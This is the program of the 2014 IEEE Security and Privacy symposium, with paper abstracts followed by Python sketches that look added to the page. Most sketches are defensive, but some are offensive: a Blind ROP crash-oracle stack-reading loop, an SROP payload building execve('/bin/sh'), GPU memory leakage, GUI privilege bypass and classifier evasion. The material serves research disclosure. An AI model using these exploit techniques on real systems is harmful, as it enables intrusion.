MAY 18-21, 2014 AT THE FAIRMONT, SAN JOSE, CA

35th IEEE Symposium on Security and Privacy



May 18


Registration and Reception

04:00PM - 07:00PM

May 19


Breakfast

07:00AM - 08:00AM

Opening Remarks

08:00AM - 08:15AM

Session: Attacks 1

08:15AM - 10:00AM

Hunting the Red Fox Online: Understanding and Detection of Mass Redirect-Script Injections
Zhou Li (RSA Laboratories), Sumayah Alrwais, XiaoFeng Wang, and Eihal Alowaisheq (Indiana University Bloomington)
Compromised websites that redirect web traffic to malicious hosts play a critical role in organized web crime, serving as doorways to all kinds of malicious web activities (e.g., drive-by downloads, phishing, etc.). They are also among the most elusive components of a malicious web infrastructure and extremely difficult to hunt down, due to the simplicity of redirect operations, which also happen on legitimate sites, and the extensive use of cloaking techniques. Making detection even more challenging is the recent trend of injecting redirect scripts into JavaScript (JS) files, as those files are not indexed by search engines and their infections are therefore more difficult to catch. In our research, we look at the problem from a unique angle: the adversary's strategy and constraints for deploying redirect scripts quickly and stealthily. Specifically, we found that such scripts are often blindly injected into both JS and HTML files for rapid deployment, that changes to infected JS files are often kept to a minimum to evade detection, and that many JS files are actually JS libraries (JS-libs) whose uninfected versions are publicly available.

Based upon those observations, we developed JsRED, a new technique for automatic detection of unknown redirect-script injections. Our approach analyzes the difference between a suspicious JS-lib file and its clean counterpart to identify malicious redirect scripts, and further searches for similar scripts in other JS and HTML files. This simple, lightweight approach is found to work effectively against redirect injection campaigns: our evaluation shows that JsRED captured most of the compromised websites with almost no false positives, significantly outperforming a commercial detection service at finding unknown JS infections. Based upon the compromised websites reported by JsRED, we further conducted a measurement study that reveals interesting features of redirect payloads and a new peer-to-peer network the adversary constructed to evade detection.
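The core differencing step lends itself to a compact illustration. The sketch below, in Python, compares a fetched JS library against a known-good copy of the same version and flags added lines that match redirect-looking patterns; the pattern list and file names are hypothetical, and the actual JsRED pipeline derives and propagates the malicious scripts far more carefully.

```python
import difflib
import re

# Hypothetical indicators of injected redirect code; JsRED itself works from
# the diff content rather than a fixed signature list.
REDIRECT_PATTERNS = [
    re.compile(r"document\.location\s*="),
    re.compile(r"window\.location\.replace\("),
    re.compile(r"document\.write\(['\"]<iframe"),
]

def added_lines(clean_js: str, suspicious_js: str):
    """Lines present in the suspicious JS-lib but not in its clean counterpart."""
    diff = difflib.unified_diff(clean_js.splitlines(), suspicious_js.splitlines(), lineterm="")
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]

def find_redirect_injection(clean_js: str, suspicious_js: str):
    """Flag added lines that look like redirect payloads."""
    return [line for line in added_lines(clean_js, suspicious_js)
            if any(p.search(line) for p in REDIRECT_PATTERNS)]

# Usage (hypothetical paths): compare a crawled copy of jquery.min.js against
# the clean release of the same library version.
# hits = find_redirect_injection(open("clean/jquery-1.8.3.min.js").read(),
#                                open("crawled/jquery-1.8.3.min.js").read())
```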
Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
Sangho Lee, Youngsok Kim, Jangwoo Kim, and Jong Kim (POSTECH)
Graphics processing units (GPUs) are important components of modern computing devices, used not only for graphics rendering but also for efficient parallel computation. However, their security has received little attention despite their importance and popularity. In this paper, we first perform an in-depth security analysis of GPUs to detect security vulnerabilities. We find that contemporary, widely used GPUs from both NVIDIA and AMD do not initialize newly allocated GPU memory pages, which may contain sensitive user data. We propose attack methods that exploit this vulnerability to reveal the GPU memory of a victim program both during its execution and right after its termination. We show the high applicability of the proposed attacks by applying them to the Chromium and Firefox web browsers, which use GPUs to accelerate webpage rendering. We find that both browsers leave webpage textures in GPU memory, allowing us to infer which webpages a victim user visits by analyzing them. The accuracy of our advanced inference attacks is up to 95.4%.
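The uninitialized-memory observation can be probed with a few lines of GPU code. The sketch below uses PyOpenCL purely as an illustration (an assumption; the paper works against the native CUDA and OpenCL stacks): it allocates a device buffer, never writes to it, copies it back, and counts the leftover non-zero bytes.

```python
import numpy as np
import pyopencl as cl  # assumption: PyOpenCL is installed; the paper probes native GPU APIs

ctx = cl.create_some_context()
queue = cl.CommandQueue(ctx)

SIZE = 16 * 1024 * 1024                                    # 16 MB of freshly allocated device memory
buf = cl.Buffer(ctx, cl.mem_flags.READ_WRITE, size=SIZE)   # allocated but never written

host = np.zeros(SIZE, dtype=np.uint8)
cl.enqueue_copy(queue, host, buf)                          # read the buffer back as-is
queue.finish()

print(np.count_nonzero(host), "non-zero bytes in newly allocated GPU memory")
# On a vulnerable driver these bytes can contain another process's data, e.g.
# webpage textures left behind by a GPU-accelerated browser.
```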
All Your Screens Are Belong to Us: Attacks Exploiting the HTML5 Screen Sharing API
Yuan Tian, Ying-Chuan Liu, Amar Bhosale, Lin-Shung Huang, Patrick Tague, and Collin Jackson (Carnegie Mellon University)
HTML5 changes many aspects of the browser world by introducing numerous new concepts; in particular, the new HTML5 screen sharing API has far-reaching security implications. One of the core assumptions on which browser security is built is that there is no cross-origin feedback loop from the client to the server. However, the screen sharing API allows the creation of a cross-origin feedback loop: websites become able to see all visible content on the user's screen, irrespective of its origin. This cross-origin feedback loop, when combined with the limitations of human sight, can introduce new vulnerabilities. An attacker could capture sensitive information from the victim's screen using the new API without the victim's consent. We investigate the security implications of the screen sharing API and discuss how existing defenses against traditional web attacks fail during screen sharing. We show that several attacks are possible with the help of the screen sharing API: cross-site request forgery, history sniffing, and information stealing. We discuss how popular websites such as Amazon and Wells Fargo can be attacked using this API and demonstrate consequences such as economic losses, compromised accounts, and information disclosure. The objective of this paper is to present the attacks enabled by the screen sharing API, analyze their fundamental cause, and motivate potential defenses toward a more secure screen sharing API.
Chip and Skim: Cloning EMV Cards with the Pre-Play Attack
Mike Bond, Omar Choudary, Steven J. Murdoch, Sergei Skorobogatov, and Ross Anderson (University of Cambridge)
EMV, also known as 'Chip and PIN', is the leading system for card payments worldwide. It is used throughout Europe and much of Asia, and is starting to be introduced in North America too. Payment cards contain a chip so they can execute an authentication protocol. This protocol requires point-of-sale (POS) terminals or ATMs to generate a nonce, called the unpredictable number, for each transaction to ensure it is fresh. We have discovered two serious problems with EMV: a widespread implementation flaw and a deeper, more difficult protocol flaw.

The first flaw is that some EMV implementers have merely used counters, timestamps or home-grown algorithms to supply this number. This exposes them to a 'pre-play' attack which is indistinguishable from card cloning from the standpoint of the logs available to the card-issuing bank, and can be carried out even if it is impossible to clone a card physically (in the sense of extracting the key material and loading it into another card). Card cloning is the very type of fraud that EMV was supposed to prevent. We describe how we detected the vulnerability, a survey methodology we developed to chart the scope of the weakness, evidence from ATM and terminal experiments in the field, and our implementation of proof-of-concept attacks. We found flaws in widely-used ATMs from the largest manufacturers. We can now explain at least some of the increasing number of frauds in which victims are refused refunds by banks which claim that EMV cards cannot be cloned and that a customer involved in a dispute must therefore be mistaken or complicit.

The second problem was exposed by the above work. It is a protocol failure and independent of the random number generator quality: pre-play attacks may also be carried out by malware in an ATM or POS terminal, or by a man-in-the-middle between the terminal and the acquirer. In this case the actual random number generated by the terminal is simply replaced by one known to the attacker. We explore the design and implementation mistakes that enabled these flaws to evade detection until now: shortcomings of the EMV specification, of the EMV kernel certification process, of implementation testing, formal analysis, and monitoring customer complaints. Finally we discuss countermeasures. More than a year after our initial responsible disclosure of these flaws to the banks, action has only been taken to mitigate the first of them, while the spread of ATM and POS malware is making the second ever more serious.
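A toy illustration of the first flaw, under the assumption of a terminal whose 'unpredictable number' is really a counter mixed with a per-minute timestamp: an attacker who has had brief access to a card can enumerate the small set of candidate numbers for a future transaction and harvest the matching authorization cryptograms from the card in advance.

```python
import time

def weak_unpredictable_number(counter: int, now: int) -> int:
    """Hypothetical flawed terminal: the 'unpredictable number' mixes a counter with a timestamp."""
    return (((now // 60) << 16) | (counter & 0xFFFF)) & 0xFFFFFFFF

def candidate_uns(last_counter: int, attack_time: int, window_minutes: int = 5):
    """Attacker's view: every UN the terminal could plausibly emit in the next few minutes."""
    return {
        weak_unpredictable_number(c, attack_time + 60 * m)
        for c in range(last_counter + 1, last_counter + 50)
        for m in range(window_minutes)
    }

cands = candidate_uns(last_counter=1041, attack_time=int(time.time()))
print(len(cands), "candidate 'unpredictable' numbers to pre-play against")
```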

Break

10:00AM - 10:30AM

Session: SSL/TLS

10:30AM - 12:15PM

When HTTPS Meets CDN: A Case of Authentication in Delegated Service
Jinjin Liang and Jian Jiang (Department of Computer Science and Technology, Tsinghua University), Haixin Duan (Institute for Network Science and Cyberspace, Tsinghua University), Kang Li (Department of Computer Science, University of Georgia), Tao Wan (Huawei Canada), and Jianping Wu (Department of Computer Science and Technology, Tsinghua University)
Content Delivery Network (CDN) and Hypertext Transfer Protocol Secure (HTTPS) are two popular but independent web technologies, each of which has been well studied individually. This paper provides a systematic study of how the two work together. We examined 20 popular CDN providers and 10,721 of their customer web sites using HTTPS. Our study reveals various problems with the current HTTPS practice adopted by CDN providers, such as widespread use of invalid certificates, private key sharing, neglected revocation of stale certificates, and insecure back-end communication. While some of these problems are operational issues only, others are rooted in the fundamental semantic conflict between the end-to-end nature of HTTPS and the man-in-the-middle nature of CDNs, which involve multiple parties in a delegated service. To address the delegation problem when HTTPS meets CDN, we proposed and implemented a lightweight solution based on DANE (DNS-based Authentication of Named Entities), an emerging IETF protocol complementing the current web PKI model. Our implementation demonstrates that it is feasible for HTTPS to work with CDNs securely and efficiently. This paper also intends to provide context for future discussion within the security and CDN communities on preferable solutions.
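The shape of the check that a DANE-based fix enables can be sketched in a few lines: the origin publishes the hash of the certificate a CDN edge is allowed to present, and the client compares that pin against what it actually receives. The pinned value below is a placeholder; in real DANE it would come from a DNSSEC-signed TLSA record, and this sketch is not the paper's implementation.

```python
import hashlib
import ssl

# Placeholder for the SHA-256 of the DER certificate the origin authorizes the
# CDN edge to serve; in DANE this value is published in a signed TLSA record.
EXPECTED_SHA256 = "0" * 64

def observed_cert_sha256(host: str, port: int = 443) -> str:
    pem = ssl.get_server_certificate((host, port))
    der = ssl.PEM_cert_to_DER_cert(pem)
    return hashlib.sha256(der).hexdigest()

def dane_style_check(host: str) -> bool:
    """Accept the connection only if the served certificate matches the published pin."""
    return observed_cert_sha256(host) == EXPECTED_SHA256

# print(dane_style_check("www.example.com"))
```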
Analyzing Forged SSL Certificates in the Wild
Lin-Shung Huang (Carnegie Mellon University), Alex Rice and Erling Ellingsen (Facebook), and Collin Jackson (Carnegie Mellon University)
The SSL man-in-the-middle attack uses forged SSL certificates to intercept encrypted connections between clients and servers. However, due to a lack of reliable indicators, it is still unclear how commonly these attacks occur in the wild. In this work, we designed and implemented a method to detect the occurrence of SSL man-in-the-middle attacks against a top global website. Over 3 million real-world SSL connections to this website were analyzed. Our results indicate that 0.2% of the SSL connections analyzed were tampered with using forged SSL certificates, most of them related to antivirus software and corporate-scale content filters. We also identified some SSL connections intercepted by malware. Limitations of the method and possible defenses against such attacks are also discussed.
Triple Handshakes and Cookie Cutters: Breaking and Fixing Authentication over TLS
Karthikeyan Bhargavan and Antoine Delignat-Lavaud (INRIA Paris-Rocquencourt), Cédric Fournet (Microsoft Research), Alfredo Pironti (INRIA Paris-Rocquencourt), and Pierre-Yves Strub (IMDEA Software Institute)
TLS was designed as a transparent channel abstraction to allow developers with no cryptography expertise to protect their application against attackers that may control some clients, some servers, and may have the capability to tamper with network connections. However, the security guarantees of TLS do not match this channel abstraction, leading to a variety of attacks. We show how some widespread false beliefs about these guarantees can be exploited, not only to attack applications that rely too naively on TLS, but also to defeat several standard authentication methods that rely on TLS. Concretely, we demonstrate new client impersonation attacks against TLS renegotiation, wireless networks, challenge-response protocols, and channel-bound cookies. Our attacks exploit combinations of RSA and DHE key exchange, session resumption, and renegotiation to bypass many recent countermeasures. We also demonstrate new ways to exploit known weaknesses of HTTP over TLS. We investigate the root causes for these attacks and propose new countermeasures. At the protocol level, we present the design and implementation of two new TLS extensions that strengthen the authentication guarantees of the TLS handshake. At the application level, we develop on top of a previously verified TLS implementation an exemplary HTTPS client library that implements several mitigations, and verify that it does provide strong, simple application security.

Best Practical Paper Award

Using Frankencerts for Automated Adversarial Testing of Certificate Validation in SSL/TLS Implementations
Chad Brubaker and Suman Jana (University of Texas at Austin), Baishakhi Ray (University Of California Davis), and Sarfraz Khurshid and Vitaly Shmatikov (University of Texas at Austin)
Modern network security rests on the Secure Sockets Layer (SSL) and Transport Layer Security (TLS) protocols. Distributed systems, mobile and desktop applications, embedded devices, and all of the secure Web rely on SSL/TLS implementations such as OpenSSL, NSS, CyaSSL, GnuTLS, PolarSSL, and MatrixSSL for protection against active and passive network attacks. This protection critically depends on whether SSL/TLS clients correctly validate the X.509 certificate presented by the server during the SSL/TLS handshake. Certificate validation is extremely complex, involving dozens of checks on various certificate constraints, extensions, certificate authorities, etc.

We design, implement, and apply the first methodology for large-scale adversarial testing of certificate validation logic in SSL/TLS implementations. Our first contribution is 'frankencerts', synthetic certificates randomly mutated from parts of real certificates. By construction, frankencerts include unusual combinations of extensions, constraints, and certificate authorities, rare and malformed extension values, etc. Testing SSL/TLS implementations with millions of frankencerts elicits behaviors that do not manifest during conventional testing. Our second ingredient is differential testing: if one SSL/TLS implementation accepts a certificate while another rejects the same certificate, one of them must be wrong. We use such discrepancies as an oracle for finding flaws in individual implementations. Testing with frankencerts uncovered many serious vulnerabilities in SSL/TLS implementations. For example, any server with a valid X.509 version 1 certificate (we observed thousands of such certificates 'in the wild') can act as a rogue certificate authority and issue fake certificates for any domain, enabling man-in-the-middle attacks against MatrixSSL. Another, very subtle bug causes GnuTLS, too, to unintentionally accept rogue version 1 certificate authorities. GnuTLS also accepts certificate authorities created by issuers who are not authorized to create such authorities. Code signing certificates, not intended for server authentication, are accepted by GnuTLS, CyaSSL, and PolarSSL.

Our differential mutation testing discovered a total of 208 discrepancies between SSL/TLS implementations. We also found serious vulnerabilities in how SSL/TLS implementations and Web browsers warn users about certificate validation errors. When presented with an expired, self-signed certificate, NSS, Safari, and Chrome (on Linux) report that the certificate has expired — a low-risk, often ignored error — but not that the connection is insecure against a man-in-the-middle attack. These results demonstrate that automated adversarial testing with frankencerts is a powerful methodology for discovering deep security flaws in SSL/TLS implementations.
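The differential-testing oracle itself is simple enough to sketch: wrap each implementation behind a common accept/reject interface and flag any certificate on which the verdicts disagree. The two command-line invocations below are illustrative assumptions, not the harness used in the paper.

```python
import subprocess

def openssl_accepts(cert_path: str, ca_path: str) -> bool:
    # Illustrative invocation; a real harness would drive the library API directly.
    r = subprocess.run(["openssl", "verify", "-CAfile", ca_path, cert_path],
                       capture_output=True, text=True)
    return r.returncode == 0 and ": OK" in r.stdout

def gnutls_accepts(cert_path: str, ca_path: str) -> bool:
    r = subprocess.run(["certtool", "--verify", "--load-ca-certificate", ca_path,
                        "--infile", cert_path], capture_output=True, text=True)
    return r.returncode == 0

VALIDATORS = {"openssl": openssl_accepts, "gnutls": gnutls_accepts}

def differential_test(frankencert_path: str, ca_path: str):
    """Return each validator's verdict; any disagreement marks a potential validation bug."""
    verdicts = {name: accepts(frankencert_path, ca_path) for name, accepts in VALIDATORS.items()}
    if len(set(verdicts.values())) > 1:
        print("discrepancy on", frankencert_path, verdicts)
    return verdicts
```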

Lunch

12:15PM - 01:30PM

Session: Automation

01:30PM - 03:15PM

Automating Isolation and Least Privilege in Web Services
Aaron Blankstein and Michael J. Freedman (Princeton University)
In many client-facing applications, a vulnerability in any part can compromise the entire application. This paper describes the design and implementation of Passe, a system that protects a data store from unintended data leaks and unauthorized writes even in the face of application compromise. Passe automatically splits (previously shared-memory-space) applications into sandboxed processes. Passe limits communication between those components and the types of accesses each component can make to shared storage, such as a backend database. In order to limit components to their least privilege, Passe uses dynamic analysis to learn data and control-flow relationships between database queries and previous query results, and it then strongly enforces those relationships.

Our prototype of Passe acts as a drop-in replacement for the Django web framework. By running eleven unmodified, off-the-shelf applications in Passe, we demonstrate its ability to provide strong security guarantees — Passe correctly enforced 96% of the applications’ policies — with little additional overhead. Additionally, in the web-specific setting of the prototype, we also mitigate the cross-component effects of cross-site scripting (XSS) attacks by combining browser HTML5 sandboxing techniques with our automatic component separation.
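A toy rendering of the enforcement idea (not Passe's actual mechanism or API): during a learning run, the monitor records that the argument of a later query must equal a value returned by an earlier authentication query, and at runtime it rejects queries that break that learned relationship.

```python
class QueryMonitor:
    """Toy enforcement of one learned data-flow constraint between two queries."""

    def __init__(self):
        self.authenticated_uid = None          # value observed in an earlier query's result

    def record_auth_result(self, row):
        # Learned during dynamic analysis: later profile queries may only use this uid.
        self.authenticated_uid = row["id"]

    def check_profile_query(self, uid):
        if uid != self.authenticated_uid:
            raise PermissionError("query argument violates learned data-flow constraint")
        return ("SELECT * FROM profiles WHERE user_id = ?", (uid,))

monitor = QueryMonitor()
monitor.record_auth_result({"id": 42, "name": "alice"})
print(monitor.check_profile_query(42))          # allowed: matches the learned relationship
# monitor.check_profile_query(7)                # blocked even if the component is compromised
```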
Hidden GEMs: Automated Discovery of Access Control Vulnerabilities in Graphical User Interfaces
Collin Mulliner, William Robertson, and Engin Kirda (Northeastern University)
Graphical user interfaces (GUIs) are the predominant means by which users interact with modern programs. GUIs contain a number of common visual elements or widgets such as labels, textfields, buttons, and lists, and GUIs typically provide the ability to set attributes on these widgets to control their visibility, enabled status, and whether they are writable. While these attributes are extremely useful for providing visual cues that guide users through an application's GUI, they can also be misused for purposes for which they were not intended. In particular, in the context of GUI-based applications that include multiple privilege levels within the application, GUI element attributes are often misused as a mechanism for enforcing access control policies.

In this work, we introduce GEMs, or instances of GUI element misuse, as a novel class of access control vulnerabilities in GUI-based applications. We present a classification of different GEMs that can arise through misuse of widget attributes, and describe a general algorithm for identifying and confirming the presence of GEMs in vulnerable applications. We then present GEM Miner, an implementation of our GEM analysis for the Windows platform. We evaluate GEM Miner over a test set of three complex, real-world GUI-based applications targeted at the small business and enterprise markets, and demonstrate the efficacy of our analysis by finding numerous previously unknown access control vulnerabilities in these applications. We have reported the vulnerabilities we discovered to the developers of each application, and in one case have received confirmation of the issue.
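The misuse is easy to picture: a privileged 'Delete user' button is merely disabled for low-privilege operators, yet the handler behind it still works once the attribute is flipped. The sketch below shows that probing step on Windows, assuming the pywin32 bindings; GEM Miner's actual analysis of widget state and privilege levels is considerably more involved.

```python
import win32con
import win32gui  # assumption: pywin32 is installed

def find_disabled_or_hidden_buttons(top_hwnd):
    """Enumerate child widgets that exist in the GUI but are disabled or hidden."""
    candidates = []

    def visit(hwnd, _):
        if win32gui.GetClassName(hwnd) == "Button" and (
                not win32gui.IsWindowEnabled(hwnd) or not win32gui.IsWindowVisible(hwnd)):
            candidates.append((hwnd, win32gui.GetWindowText(hwnd)))
        return True

    win32gui.EnumChildWindows(top_hwnd, visit, None)
    return candidates

def probe(hwnd):
    """Re-enable the widget and deliver a click; if the privileged action fires, it is a GEM."""
    win32gui.EnableWindow(hwnd, True)
    win32gui.SendMessage(hwnd, win32con.BM_CLICK, 0, 0)
```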
Automated Analysis of Security Protocols with Global State
Steve Kremer (INRIA Nancy) and Robert Künnemann (TU Darmstadt)
Security APIs, key servers, and protocols that need to track the status of transactions must maintain a global, non-monotonic state, e.g., in the form of a database or register. However, existing automated verification tools do not support the analysis of such stateful security protocols – sometimes for fundamental reasons, such as the encoding of the protocol as Horn clauses, which are inherently monotonic. An exception is the recent tamarin prover, which allows specifying protocols as multiset rewrite (MSR) rules, a formalism expressive enough to encode state. As multiset rewriting is a 'low-level' specification language with no direct support for concurrent message passing, encoding protocols correctly is a difficult and error-prone process.

We propose a process calculus which is a variant of the applied pi calculus with constructs for manipulation of a global state by processes running in parallel. We show that this language can be translated to MSR rules whilst preserving all security properties expressible in a dedicated first-order logic for security properties. The translation has been implemented in a prototype tool which uses the tamarin prover as a backend. We apply the tool to several case studies among which a simplified fragment of PKCS#11, the Yubikey security token, and an optimistic contract signing protocol.
Automated Verification of Group Key Agreement Protocols
Benedikt Schmidt (IMDEA Software Institute, Madrid, Spain), Ralf Sasse (Institute of Information Security, ETH Zürich), Cas Cremers (University of Oxford), and David Basin (Institute of Information Security, ETH Zürich)
We advance the state-of-the-art in automated symbolic cryptographic protocol analysis by providing the first algorithm that can handle Diffie-Hellman exponentiation, bilinear pairing, and AC-operators. Our support for AC-operators enables protocol specifications to use multisets, natural numbers, and finite maps. We implement the algorithm in the Tamarin prover and provide the first symbolic correctness proofs for group key agreement protocols that use Diffie-Hellman or bilinear pairing, loops, and recursion, while at the same time supporting advanced security properties, such as perfect forward secrecy or eCK-security. We automatically verify a set of protocols, including the STR, group Joux, and GDH protocols, thereby demonstrating the effectiveness of our approach.

Break

03:15PM - 03:45PM

Session: Attacks 2

03:45PM - 05:30PM

Practical Evasion of a Learning-Based Classifier: A Case Study
Nedim Šrndić and Pavel Laskov (University of Tuebingen)
Learning-based classifiers are increasingly used for the detection of various forms of malicious data. However, if they are deployed online, an attacker may attempt to evade them by manipulating the data. Examples of such attacks have been previously studied under the assumption that the attacker has full knowledge of the deployed classifier. In practice, such assumptions rarely hold, especially for systems deployed online; still, a significant amount of information about a deployed classifier system can be obtained from various sources. In this paper, we experimentally investigate the effectiveness of classifier evasion using a real, deployed system, PDFrate, as a test case. We develop a taxonomy of practical evasion strategies and adapt known evasion algorithms to implement specific scenarios in our taxonomy. Our experimental results reveal a substantial drop in PDFrate's classification scores and detection accuracy after it is exposed to even simple attacks. We further study potential defense mechanisms against classifier evasion. Our experiments reveal that the original defense technique proposed for PDFrate is only effective if the executed attack exactly matches the anticipated one. In discussing the findings of our study, we analyze some potential techniques for increasing the robustness of learning-based systems against adversarial manipulation of data.
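A toy version of the weakest attack in such a taxonomy, adding benign-looking features to a malicious sample, is sketched below with scikit-learn on made-up features; the real study targets PDFrate's structural PDF features and operates without full knowledge of the deployed model.

```python
import numpy as np
from sklearn.linear_model import LogisticRegression

rng = np.random.default_rng(0)

# Made-up 20-dimensional feature vectors: benign documents are rich in the
# first 10 ("benign") features, malicious ones in the last 10.
benign = rng.poisson(3.0, size=(200, 20)).astype(float)
benign[:, 10:] = 0                       # benign samples lack the "malicious" features
malicious = rng.poisson(3.0, size=(200, 20)).astype(float)
malicious[:, :10] = 0                    # malicious samples lack the "benign" features
X = np.vstack([benign, malicious])
y = np.array([0] * 200 + [1] * 200)

clf = LogisticRegression(max_iter=1000).fit(X, y)

sample = malicious[0].copy()
print("malicious score before:", clf.predict_proba(sample.reshape(1, -1))[0, 1])

# Mimicry: add benign-looking content (fonts, metadata, whitespace, ...) that
# raises benign feature counts without touching the malicious payload.
sample[:10] += 5
print("malicious score after: ", clf.predict_proba(sample.reshape(1, -1))[0, 1])
```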
Doppelgänger Finder: Taking Stylometry To The Underground
Sadia Afroz (UC Berkeley), Aylin Caliskan-Islam, Ariel Stolerman, and Rachel Greenstadt (Drexel University), and Damon McCoy (George Mason University)
Stylometry is a method for identifying anonymous authors of anonymous texts by analyzing their writing style. While stylometric methods have produced impressive results in previous experiments, we wanted to explore their performance on a challenging dataset of particular interest to the security research community. Analysis of underground forums can provide key information about who controls a given bot network or sells a service, and the size and scope of the cybercrime underworld. Previous analyses have been accomplished primarily through analysis of limited structured metadata and painstaking manual analysis. However, the key challenge is to automate this process, since this labor intensive manual approach clearly does not scale.

We consider two scenarios. The first involves text written by an unknown cybercriminal and a set of potential suspects. This is a standard, supervised stylometry problem made more difficult by multilingual forums that mix l33t-speak conversations with data dumps. In the second scenario, you want to feed a forum into an analysis engine and have it output possible doppelgängers, or users with multiple accounts. While other researchers have explored this problem, we propose a method that produces good results on actual separate accounts, as opposed to data sets created by artificially splitting authors into multiple identities.

For scenario 1, we achieve 77.2% to 84% accuracy on private messages. For scenario 2, we achieve 94% recall with 90.38% precision on blogs and 85.18% recall with 82.14% precision for underground forum users. We demonstrate the utility of our approach with a case study that includes applying our technique to the Carders forum and manual analysis to validate the results, enabling the discovery of previously undetected doppelgänger accounts.
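A compressed sketch of the second scenario's core idea, assuming scikit-learn: build an attribution model from character n-grams while holding one account out, then see whose writing its posts most resemble; account pairs that attribute to each other unusually strongly are doppelgänger candidates. Doppelgänger Finder itself uses a richer feature set and a principled probability combination.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.pipeline import make_pipeline

def cross_attribution(accounts, suspect):
    """Train on every account except `suspect`, then attribute the suspect's posts."""
    names = [n for n in accounts if n != suspect]
    docs = [post for n in names for post in accounts[n]]
    labels = [n for n in names for _ in accounts[n]]
    model = make_pipeline(
        TfidfVectorizer(analyzer="char_wb", ngram_range=(2, 4), min_df=2),
        LogisticRegression(max_iter=1000),
    ).fit(docs, labels)
    mean_probs = model.predict_proba(accounts[suspect]).mean(axis=0)
    return dict(zip(model.classes_, mean_probs))

def find_doppelgangers(accounts, threshold=0.6):
    """accounts: {account_name: [post, ...]}. Returns account pairs likely run by one author."""
    pairs = set()
    for suspect in accounts:
        for other, p in cross_attribution(accounts, suspect).items():
            if p > threshold:
                pairs.add(tuple(sorted((suspect, other))))
    return pairs
```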
Hacking Blind
Andrea Bittau, Adam Belay, Ali Mashtizadeh, David Mazières, and Dan Boneh (Stanford)
We show that it is possible to write remote stack buffer overflow exploits without possessing a copy of the target binary or source code, against services that restart after a crash. This makes it possible to hack proprietary closed-binary services, or open-source servers manually compiled and installed from source where the binary remains unknown to the attacker. Traditional techniques are usually paired against a particular binary and distribution where the hacker knows the location of useful gadgets for Return Oriented Programming (ROP). Our Blind ROP (BROP) attack instead remotely finds enough ROP gadgets to perform a write system call and transfers the vulnerable binary over the network, after which an exploit can be completed using known techniques. This is accomplished by leaking a single bit of information based on whether a process crashed or not when given a particular input string. BROP requires a stack vulnerability and a server that restarts after a crash. We implemented Braille, a fully automated exploit that yielded a shell in under 4,000 requests (20 minutes) against a contemporary nginx vulnerability, yaSSL + MySQL, and a toy proprietary server written by a colleague. The attack works against modern 64-bit Linux with address space layout randomization (ASLR) and no-execute page protection (NX).
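The crash-or-not oracle at the heart of BROP fits in a few lines; the service details, overflow offset, and payload framing below are placeholders, and a real exploit must also distinguish hangs from crashes and handle protocol framing.

```python
import socket

HOST, PORT = "target.example", 80       # placeholder: a forking service that restarts workers
OFFSET = 4096                           # hypothetical padding up to the data being guessed

def survives(payload: bytes, timeout: float = 2.0) -> bool:
    """One probe leaks one bit: did the worker crash (reset/silence) or answer normally?"""
    try:
        with socket.create_connection((HOST, PORT), timeout=timeout) as s:
            s.sendall(payload)
            return s.recv(1) != b""      # got a response: the worker is still alive
    except (ConnectionResetError, ConnectionRefusedError, socket.timeout):
        return False

def leak_next_byte(known: bytes) -> int:
    """Stack reading: overwrite one more byte, keeping the single guess that does not crash."""
    for guess in range(256):
        if survives(b"A" * OFFSET + known + bytes([guess])):
            return guess
    raise RuntimeError("no guess survived; re-check the overflow offset")

# known = b""
# for _ in range(8):                     # e.g. recover an 8-byte stack canary byte by byte
#     known += bytes([leak_next_byte(known)])
```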

Best Student Paper Award (of Two)

Framing Signals — A Return to Portable Shellcode
Erik Bosman and Herbert Bos (Vrije Universiteit Amsterdam)
Signal handling has been an integral part of UNIX systems since the earliest implementations in the 1970s. Nowadays, we find signals in all common flavors of UNIX, including BSD, Linux, Solaris, Android, and Mac OS. While each flavor handles signals in slightly different ways, the implementations are very similar. In this paper, we show that signal handling can be used as an attack method in exploits and backdoors. The problem has been a part of UNIX from the beginning, and now that advanced security measures like ASLR, DEP, and stack cookies have made simple exploitation much harder, our technique is among the lowest-hanging fruit available to an attacker.

Specifically, we describe Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. Like return-oriented programming (ROP), sigreturn oriented programming constructs what is known as a ‘weird machine’ that can be programmed by attackers to change the behavior of a process. To program the machine, attackers set up fake signal frames and initiate returns from signals that the kernel never really delivered. This is possible, because UNIX stores signal frames on the process’ stack. Sigreturn oriented programming is interesting for attackers, OS developers and academics. For attackers, the technique is very versatile, with pre-conditions that are different from those of existing exploitation techniques like ROP. Moreover, unlike ROP, sigreturn oriented programming programs are portable. For OS developers, the technique presents a problem that has been present in one of the two main operating system families from its inception, while the fixes (which we also present) are non-trivial. From a more academic viewpoint, it is also interesting because we show that sigreturn oriented programming is Turing complete.

We demonstrate the usefulness of the technique in three applications. First, we describe the exploitation of a vulnerable web server on different Linux distributions. Second, we build a very stealthy proof-of-concept backdoor. Third, we use SROP to bypass Apple’s code signing and security vetting process by building an app that can execute arbitrary system calls. Finally, we discuss mitigation techniques.
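pwntools ships a helper for building such fake frames; the sketch below, assuming an x86-64 Linux target and placeholder addresses, shows the shape of an SROP payload in which a single sigreturn loads attacker-chosen register values for an execve("/bin/sh") call. It is a sketch of the technique, not an exploit for any particular binary.

```python
from pwn import SigreturnFrame, constants, context, p64

context.arch = "amd64"                       # x86-64 Linux target

# Placeholder addresses; a real exploit must learn or leak these.
SIGRETURN_GADGET = 0x0000000000401234        # sets rax to SYS_rt_sigreturn and issues "syscall"
SYSCALL_GADGET = 0x0000000000401337          # a plain "syscall" instruction
BINSH = 0x0000000000601000                   # address of the string "/bin/sh\x00"

frame = SigreturnFrame()                     # fake signal frame the kernel will restore
frame.rax = constants.SYS_execve             # register values loaded when sigreturn fires
frame.rdi = BINSH
frame.rsi = 0
frame.rdx = 0
frame.rip = SYSCALL_GADGET                   # execution resumes here with those registers

payload = b"A" * 128                         # hypothetical padding up to the saved return address
payload += p64(SIGRETURN_GADGET)             # trigger a sigreturn on a frame we control...
payload += bytes(frame)                      # ...namely this one, placed on the stack
```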

Poster Reception

05:45PM - 07:45PM

A program for posters is now available.

May 20


Breakfast

07:00AM - 08:00AM

Awards

08:00AM - 08:15AM

The best paper awards have been announced.

Session: Systems Security

08:15AM - 10:00AM

Pivot: Fast, Synchronous Mashup Isolation Using Generator Chains
James Mickens (Microsoft Research)
